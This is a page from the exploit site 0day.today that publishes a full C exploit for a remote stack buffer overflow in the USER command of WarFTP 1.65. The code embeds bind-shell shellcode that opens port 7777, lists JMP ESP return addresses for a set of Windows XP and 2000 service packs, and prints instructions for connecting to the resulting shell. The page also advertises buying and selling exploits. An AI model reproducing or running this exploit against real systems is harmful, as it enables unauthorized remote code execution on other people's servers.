0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WarFTP 1.65 (USER) Remote Buffer Overlow Exploit (multiple targets)
[===================================================================
WarFTP 1.65 (USER) Remote Buffer Overlow Exploit (multiple targets)
===================================================================
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#define VULNSERVER "WAR-FTPD 1.65"
#define VULNCMD "\x55\x53\x45\x52\x20"
#define ZERO '\x00'
#define NOP '\x90'
#define VULNBUFF 485
#define BUFFREAD 128
#define PORT 21
#define LENJMPESP 4
/* #############################################################################
##### #####
##### WARFTP - VERSION 1.65 #####
##### #####
##### WarFTP Username Stack-Based Buffer-Overflow Vulnerability #####
##### #####
##### DESCRIPTION: WarFTP is prone to a stack-based buffer-overflow #####
##### vulnerability because it fails to properly check boundaries #####
##### on user-supplied data before copying it to an insufficiently #####
##### sized buffer. #####
##### #####
##### FUNC VULNERABLE: sprintf(char *buffer, const char *format, argv) #####
##### 0x004044E7: sprintf(0x00ACFB50, "%sCRLF", ExploitBuffer) #####
##### #####
##### AFFECTED VERSION: 1.65 #####
##### USE: warftphack.exe IP_ADDRESS SO_&_SERVICE_PACK [ ESP ADDRESS ] #####
##### SO_&_SERVICE_PACK: #####
##### [0] Microsoft Windows XP Pro Spanish SP0 #####
##### [1] Microsoft Windows XP Pro Spanish SP1 #####
##### [2] Microsoft Windows XP Pro Spanish SP2 #####
##### [3] Microsoft Windows XP Pro English SP0 #####
##### [4] Microsoft Windows XP Pro English SP1 #####
##### [5] Microsoft Windows XP Pro English SP2 #####
##### [6] Microsoft Windows 2000 Pro Spanish SP0 #####
##### [7] Microsoft Windows 2000 Pro Spanish SP1 #####
##### [8] Microsoft Windows 2000 Pro Spanish SP2 #####
##### [9] Microsoft Windows 2000 Pro Spanish SP3 #####
##### [10] Microsoft Windows 2000 Pro English SP0 #####
##### [11] Microsoft Windows 2000 Pro English SP1 #####
##### [12] Microsoft Windows 2000 Pro English SP2 #####
##### [13] Microsoft Windows 2000 Pro English SP3 #####
##### [14] Custom -> JMP ESP ADDRESS #####
##### #####
##### EXAMPLE: warftphack.exe 127.0.0.1 2 #####
##### EXAMPLE2: warftphack.exe 127.0.0.1 14 0x776EDDFF #####
##### #####
##### AUTOR: niXel - SYSCODE (SPAIN) #####
##### IDE: Dev-C ver-4.9.9.2 #####
##### COMPILER: MinGW #####
##### DEPENDENCES: Linker -> libwsock32.a #####
##### MAIL: Und3rground2002@hotmail.com #####
##### #####
#############################################################################
CAUTION: USER command vulnerable => no send \x40 (@) char into shellcode (user@host)
no send \x0A (\n) char into shellcode
no send \x0D (\r) char into shellcode
FUNCTION sprintf => no send \x00 (\0) char into shellcode
############################ BINDSHELLCODE ##############################
[7777] */
char syscode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x71\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x6d\x39\x4b\x4c\x32"
"\x4a\x5a\x4b\x50\x4d\x6d\x38\x6b\x49\x49\x6f\x59\x6f\x39\x6f\x35"
"\x30\x6c\x4b\x70\x6c\x65\x74\x37\x54\x4c\x4b\x42\x65\x47\x4c\x6e"
"\x6b\x31\x6c\x46\x65\x33\x48\x43\x31\x48\x6f\x6c\x4b\x70\x4f\x65"
"\x48\x6c\x4b\x73\x6f\x35\x70\x37\x71\x38\x6b\x31\x59\x4c\x4b\x46"
"\x54\x6e\x6b\x53\x31\x58\x6e\x30\x31\x6f\x30\x4f\x69\x4e\x4c\x4b"
"\x34\x49\x50\x41\x64\x46\x67\x49\x51\x7a\x6a\x46\x6d\x43\x31\x48"
"\x42\x5a\x4b\x38\x74\x47\x4b\x30\x54\x64\x64\x51\x38\x42\x55\x4b"
"\x55\x4e\x6b\x53\x6f\x51\x34\x43\x31\x4a\x4b\x50\x66\x4e\x6b\x46"
"\x6c\x42\x6b\x4c\x4b\x73\x6f\x75\x4c\x33\x31\x5a\x4b\x65\x53\x34"
"\x6c\x6e\x6b\x6d\x59\x30\x6c\x57\x54\x55\x4c\x55\x31\x4b\x73\x74"
"\x71\x69\x4b\x65\x34\x6e\x6b\x43\x73\x74\x70\x6c\x4b\x67\x30\x46"
"\x6c\x6c\x4b\x70\x70\x67\x6c\x6e\x4d\x6c\x4b\x57\x30\x44\x48\x71"
"\x4e\x72\x48\x4e\x6e\x50\x4e\x54\x4e\x38\x6c\x70\x50\x4b\x4f\x4e"
"\x36\x71\x76\x41\x43\x31\x76\x31\x78\x76\x53\x30\x32\x53\x58\x30"
"\x77\x44\x33\x57\x42\x63\x6f\x70\x54\x6b\x4f\x48\x50\x73\x58\x58"
"\x4b\x58\x6d\x6b\x4c\x57\x4b\x70\x50\x6b\x4f\x6a\x76\x71\x4f\x6d"
"\x59\x4b\x55\x65\x36\x6c\x41\x68\x6d\x53\x38\x63\x32\x42\x75\x51"
"\x7a\x36\x62\x59\x6f\x58\x50\x71\x78\x4a\x79\x34\x49\x4b\x45\x6e"
"\x4d\x30\x57\x69\x6f\x4e\x36\x52\x73\x41\x43\x62\x73\x76\x33\x51"
"\x43\x70\x43\x43\x63\x73\x73\x36\x33\x6b\x4f\x4a\x70\x75\x36\x41"
"\x78\x75\x4e\x71\x71\x35\x36\x42\x73\x4b\x39\x79\x71\x6c\x55\x70"
"\x68\x4f\x54\x75\x4a\x32\x50\x39\x57\x52\x77\x69\x6f\x38\x56\x70"
"\x6a\x72\x30\x50\x51\x53\x65\x4b\x4f\x58\x50\x55\x38\x6c\x64\x4c"
"\x6d\x34\x6e\x49\x79\x66\x37\x6b\x4f\x4e\x36\x50\x53\x30\x55\x69"
"\x6f\x4a\x70\x53\x58\x7a\x45\x41\x59\x4e\x66\x37\x39\x36\x37\x69"
"\x6f\x59\x46\x72\x70\x50\x54\x31\x44\x33\x65\x4b\x4f\x5a\x70\x4f"
"\x63\x51\x78\x38\x67\x50\x79\x38\x46\x43\x49\x32\x77\x4b\x4f\x4b"
"\x66\x62\x75\x79\x6f\x6a\x70\x45\x36\x30\x6a\x52\x44\x30\x66\x41"
"\x78\x32\x43\x72\x4d\x6f\x79\x6d\x35\x62\x4a\x42\x70\x70\x59\x74"
"\x69\x5a\x6c\x6c\x49\x6b\x57\x41\x7a\x32\x64\x6b\x39\x68\x62\x30"
"\x31\x6f\x30\x6b\x43\x6e\x4a\x6b\x4e\x51\x52\x34\x6d\x49\x6e\x62"
"\x62\x36\x4c\x5a\x33\x6c\x4d\x71\x6a\x65\x68\x6e\x4b\x4c\x6b\x4e"
"\x4b\x55\x38\x30\x72\x59\x6e\x4c\x73\x37\x66\x4b\x4f\x30\x75\x63"
"\x74\x39\x6f\x6e\x36\x33\x6b\x36\x37\x72\x72\x31\x41\x31\x41\x46"
"\x31\x50\x6a\x55\x51\x31\x41\x41\x41\x32\x75\x42\x71\x39\x6f\x48"
"\x50\x50\x68\x6c\x6d\x39\x49\x45\x55\x78\x4e\x30\x53\x39\x6f\x6b"
"\x66\x62\x4a\x79\x6f\x39\x6f\x47\x47\x39\x6f\x58\x50\x4e\x6b\x50"
"\x57\x4b\x4c\x6c\x43\x4b\x74\x70\x64\x6b\x4f\x6a\x76\x41\x42\x49"
"\x6f\x58\x50\x30\x68\x68\x6f\x6a\x6e\x4b\x50\x31\x70\x42\x73\x49"
"\x6f\x58\x56\x49\x6f\x78\x50\x61";
int main(int argc, char ** argv) {
char buffRead[BUFFREAD], jmpESP[LENJMPESP], ch, ch2;
char * pbuffSend;
unsigned int err = 0, i, k;
int sockData, j;
struct sockaddr_in their_addr;
WSADATA wsaData;
system("cls");
fprintf(stdout, "\n\tWarFTP Username Stack-Based Buffer-Overflow Vulnerability\n");
fprintf(stdout, " ____________________________________________________________________\n\n");
if (((argc == 3) && (atoi(argv[2]) >= 0) && (atoi(argv[2]) < 14)) || ((argc == 4) && (atoi(argv[2]) == 14))) {
if (WSAStartup(MAKEWORD(2, 0), &wsaData) == 0) {
if ((sockData = socket(AF_INET, SOCK_STREAM, 0)) != -1) {
/* Server data struct */
their_addr.sin_family = AF_INET; // ; Family AF_INET
their_addr.sin_addr.s_addr = inet_addr(argv[1]); // ; IP Address = Argv[1]
their_addr.sin_port = htons(PORT); // ; Port = 21
memset(&(their_addr.sin_zero), '0', 8); // ; IP:Port = Argv[1]:21
if (connect(sockData, (struct sockaddr *) &their_addr, sizeof(struct sockaddr)) != -1) {
recv(sockData, buffRead, BUFFREAD, 0);
buffRead[BUFFREAD - 1] = ZERO;
if (strstr(buffRead, VULNSERVER) != NULL) {
/* #################################################################################
##### BufferSend -> "USER A*VULNBUFF @JMP_ESP \x90\x90\x90\x90 SYSCODE \r\n #####
################################################################################# */
pbuffSend = (char *) malloc(strlen(VULNCMD) + VULNBUFF + LENJMPESP + (sizeof(char) * 4) + strlen(syscode) + (sizeof(char) * 2));
if (pbuffSend != NULL) {
for (i=0; i < strlen(VULNCMD); i++) *(pbuffSend + i) = VULNCMD[i];
for (j=0; j < VULNBUFF; i++, j++) *(pbuffSend + i) = '\x41';
/* - OPcodes from ntdll.dll -> JMP ESP - */
switch(atoi(argv[2])) {
case 0: memcpy(jmpESP, "\xE3\x39\xF4\x77", LENJMPESP); break;
case 1: memcpy(jmpESP, "\x0F\x98\xF8\x77", LENJMPESP); break;
case 2: memcpy(jmpESP, "\xED\x1E\x95\x7C", LENJMPESP); break;
case 3: memcpy(jmpESP, "\xE3\x39\xF4\x77", LENJMPESP); break;
case 4: memcpy(jmpESP, "\xCC\x59\xFA\x77", LENJMPESP); break;
case 5: memcpy(jmpESP, "\xED\x1E\x95\x7C", LENJMPESP); break;
case 6: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 7: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 8: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 9: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 10: memcpy(jmpESP, "\x8B\x94\xF8\x77", LENJMPESP); break;
case 11: memcpy(jmpESP, "\xAB\x67\xF9\x77", LENJMPESP); break;
case 12: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 13: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 14:
k = 0;
if ((strncmp(argv[3], "0x", (sizeof(char) * 2)) == 0) && (strlen(argv[3]) == 10)) {
for (j=(sizeof(char) * 8) - 1; ((j >= 0) && (!err)); j--) {
ch = *(argv[3] + j + 2);
if (((ch > 47) && (ch < 58)) || ((ch > 64) && (ch < 71)) || ((ch > 96) && (ch < 103))) {
if ((ch > 47) && (ch < 58)) ch -= 48;
else if ((ch > 64) && (ch < 71)) ch -= 55;
else ch -= 87;
if ((j % 2) == 0) jmpESP[k++] = ((ch <<= 4) | ch2);
else ch2 = ch;
}
else { fprintf(stderr, "\t[ ERROR ] Three parameter syntax error\n\t[ ERROR ] Example: 0xFFFFFFFF\n"); err = 1; }
}
}
else { fprintf(stderr, "\t[ ERROR ] Three parameter syntax error\n\t[ ERROR ] Example: 0xFFFFFFFF\n"); err = 1; }
}
if (!err) {
for (j=0; j < LENJMPESP; i++, j++) *(pbuffSend + i) = jmpESP[j];
for (j=0; j < (sizeof(char) * 4); i++, j++) *(pbuffSend + i) = NOP;
for (j=0; j < strlen(syscode); i++, j++) *(pbuffSend + i) = syscode[j];
memcpy(pbuffSend + i, "\r\n", (sizeof(char) * 2));
if (i == send(sockData, pbuffSend, ++i, 0)) {
fprintf(stdout, "\t[ OK ] Exploit buffer send to %s:%d\n", argv[1], PORT);
fprintf(stdout, "\t[ OK ] If you have not chosen a correct operating system and\n\t service pack you can cause a D.O.S\n");
fprintf(stdout, "\t[ OK ] Connect: telnet %s 7777\n", argv[1]);
}
else fprintf(stderr, "\t[ ERROR ] No sending all exploit buffer\n");
}
free(pbuffSend);
}
else fprintf(stderr, "\t[ ERROR ] No allocate memory\n");
}
else fprintf(stderr, "\t[ ERROR ] Not a vulnerable server\n");
}
else fprintf(stderr, "\t[ ERROR ] Connect to %s:%d\n", argv[1], PORT);
closesocket(sockData);
}
else fprintf(stderr, "\t[ ERROR ] Create local socket\n");
WSACleanup();
}
else fprintf(stderr, "\t[ ERROR ] Load library");
}
else {
fprintf(stderr, " [ + ] USE: %s IP_ADDRESS SERVICE_PACK [ ESP_ADDRESS ]\n\n", argv[0]);
fprintf(stderr, " [ + ] SERVICE PACK: [ - ] Microsoft Windows XP Pro Spanish SP0 (0)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro Spanish SP1 (1)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro Spanish SP2 (2)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP0 (3)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP1 (4)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP2 (5)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP0 (6)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP1 (7)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP2 (8)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP3 (9)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP0 (10)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP1 (11)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP2 (12)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP3 (13)\n");
fprintf(stderr, "\t\t\t[ - ] Custom Service Pack - JMP %%ESP (14)\n\n");
fprintf(stderr, " [ + ] EXAMPLE: %s 127.0.0.1 2\n", argv[0]);
fprintf(stderr, " [ + ] EXAMPLE2: %s 127.0.0.1 14 0x776EDDFF\n", argv[0]);
}
fprintf(stdout, " ___________________________________________________________________\n\n");
return 0;
}
# 0day.today [2024-11-15] #